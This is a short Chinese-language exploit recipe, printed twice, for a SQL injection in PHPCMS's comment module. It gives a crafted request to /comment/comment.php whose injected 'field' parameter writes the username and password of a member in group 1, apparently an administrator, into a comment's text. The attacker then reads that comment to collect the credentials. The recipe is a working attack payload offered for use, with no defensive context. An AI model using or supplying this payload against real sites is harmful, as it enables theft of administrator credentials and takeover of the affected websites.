1、找到任意一篇文章发表评论并得到评论ID
2、提交/comment/comment.php?field=content%3D(select+concat(username%2C0x3a%2Cpassword)+from+phpcms_member+where+groupid%3D1+limit+1)+where+commentid%3D1%23&action=vote 红色替换为评论ID
3、重新查看评论
漏洞成因很简单,利用方法也不止这一种,有兴趣的同学可以研究下。
1、找到任意一篇文章发表评论并得到评论ID
2、提交/comment/comment.php?field=content%3D(select+concat(username%2C0x3a%2Cpassword)+from+phpcms_member+where+groupid%3D1+limit+1)+where+commentid%3D1%23&action=vote 红色替换为评论ID
3、重新查看评论
漏洞成因很简单,利用方法也不止这一种,有兴趣的同学可以研究下。